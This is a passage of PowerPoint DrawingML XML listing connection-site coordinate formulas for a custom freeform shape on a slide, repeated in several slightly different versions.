              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 29283 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY78" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 445527 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 29113 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY77" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342163 w 1342163"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78857 w 1342163"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115450 w 1342163"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 126950 w 1342163"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144357 w 1342163"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 155935 w 1342163"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228778 w 1342163"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244465 w 1342163"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 263305 w 1342163"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 251079 w 1342163"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 243737 w 1342163"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 242535 w 1342163"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 250120 w 1342163"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 280078 w 1342163"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 309876 w 1342163"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 323888 w 1342163"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 348319 w 1342163"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 385202 w 1342163"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 423583 w 1342163"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 429742 w 1342163"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 438024 w 1342163"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 441634 w 1342163"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 455500 w 1342163"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 458231 w 1342163"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 456489 w 1342163"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 463398 w 1342163"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 474657 w 1342163"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 480560 w 1342163"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 479873 w 1342163"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 471521 w 1342163"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 452174 w 1342163"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 453803 w 1342163"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 441503 w 1342163"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 441228 w 1342163"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 445527 w 1342163"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 455900 w 1342163"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 466796 w 1342163"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 474142 w 1342163"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 473438 w 1342163"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 476881 w 1342163"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 498311 w 1342163"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 480837 w 1342163"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 456245 w 1342163"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 441720 w 1342163"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 416894 w 1342163"/>
              <a:gd name="connsiteY46" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 374174 w 1342163"/>
              <a:gd name="connsiteY47" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 308426 w 1342163"/>
              <a:gd name="connsiteY48" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 279243 w 1342163"/>
              <a:gd name="connsiteY49" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 283313 w 1342163"/>
              <a:gd name="connsiteY50" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 251144 w 1342163"/>
              <a:gd name="connsiteY51" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 241031 w 1342163"/>
              <a:gd name="connsiteY52" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 225248 w 1342163"/>
              <a:gd name="connsiteY53" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 222706 w 1342163"/>
              <a:gd name="connsiteY54" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 223699 w 1342163"/>
              <a:gd name="connsiteY55" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 196683 w 1342163"/>
              <a:gd name="connsiteY56" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 173240 w 1342163"/>
              <a:gd name="connsiteY57" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 127039 w 1342163"/>
              <a:gd name="connsiteY58" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 98476 w 1342163"/>
              <a:gd name="connsiteY59" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 79271 w 1342163"/>
              <a:gd name="connsiteY60" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 85093 w 1342163"/>
              <a:gd name="connsiteY61" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 79485 w 1342163"/>
              <a:gd name="connsiteY62" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 85358 w 1342163"/>
              <a:gd name="connsiteY63" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 66946 w 1342163"/>
              <a:gd name="connsiteY64" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 55682 w 1342163"/>
              <a:gd name="connsiteY65" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 57138 w 1342163"/>
              <a:gd name="connsiteY66" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 52003 w 1342163"/>
              <a:gd name="connsiteY67" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 12141 w 1342163"/>
              <a:gd name="connsiteY68" fmla="*/ 711705 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 9051 w 1342163"/>
              <a:gd name="connsiteY69" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 2707 w 1342163"/>
              <a:gd name="connsiteY70" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 3 w 1342163"/>
              <a:gd name="connsiteY71" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 3911 w 1342163"/>
              <a:gd name="connsiteY72" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 44500 w 1342163"/>
              <a:gd name="connsiteY73" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 43543 w 1342163"/>
              <a:gd name="connsiteY74" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 33828 w 1342163"/>
              <a:gd name="connsiteY75" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 15381 w 1342163"/>
              <a:gd name="connsiteY76" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 82549 w 1409331"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1409331 w 1409331"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1409331 w 1409331"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 146025 w 1409331"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 182618 w 1409331"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 194118 w 1409331"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 211525 w 1409331"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 223103 w 1409331"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 295946 w 1409331"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 311633 w 1409331"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 330473 w 1409331"/>
              <a:gd name="connsiteY10" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 318247 w 1409331"/>
              <a:gd name="connsiteY11" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 310905 w 1409331"/>
              <a:gd name="connsiteY12" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 309703 w 1409331"/>
              <a:gd name="connsiteY13" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 317288 w 1409331"/>
              <a:gd name="connsiteY14" fmla="*/ 5905303 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 347246 w 1409331"/>
              <a:gd name="connsiteY15" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 377044 w 1409331"/>
              <a:gd name="connsiteY16" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 391056 w 1409331"/>
              <a:gd name="connsiteY17" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 415487 w 1409331"/>
              <a:gd name="connsiteY18" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 452370 w 1409331"/>
              <a:gd name="connsiteY19" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 490751 w 1409331"/>
              <a:gd name="connsiteY20" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 496910 w 1409331"/>
              <a:gd name="connsiteY21" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 505192 w 1409331"/>
              <a:gd name="connsiteY22" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 508802 w 1409331"/>
              <a:gd name="connsiteY23" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 522668 w 1409331"/>
              <a:gd name="connsiteY24" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 525399 w 1409331"/>
              <a:gd name="connsiteY25" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 523657 w 1409331"/>
              <a:gd name="connsiteY26" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 530566 w 1409331"/>
              <a:gd name="connsiteY27" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 541825 w 1409331"/>
              <a:gd name="connsiteY28" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 547728 w 1409331"/>
              <a:gd name="connsiteY29" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 547041 w 1409331"/>
              <a:gd name="connsiteY30" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 538689 w 1409331"/>
              <a:gd name="connsiteY31" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 519342 w 1409331"/>
              <a:gd name="connsiteY32" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 520971 w 1409331"/>
              <a:gd name="connsiteY33" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 508671 w 1409331"/>
              <a:gd name="connsiteY34" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 508396 w 1409331"/>
              <a:gd name="connsiteY35" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 512695 w 1409331"/>
              <a:gd name="connsiteY36" fmla="*/ 3872886 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 523068 w 1409331"/>
              <a:gd name="connsiteY37" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 533964 w 1409331"/>
              <a:gd name="connsiteY38" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 541310 w 1409331"/>
              <a:gd name="connsiteY39" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 540606 w 1409331"/>
              <a:gd name="connsiteY40" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 544049 w 1409331"/>
              <a:gd name="connsiteY41" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 565479 w 1409331"/>
              <a:gd name="connsiteY42" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 548005 w 1409331"/>
              <a:gd name="connsiteY43" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 523413 w 1409331"/>
              <a:gd name="connsiteY44" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 508888 w 1409331"/>
              <a:gd name="connsiteY45" fmla="*/ 3072935 h 6858000"/>
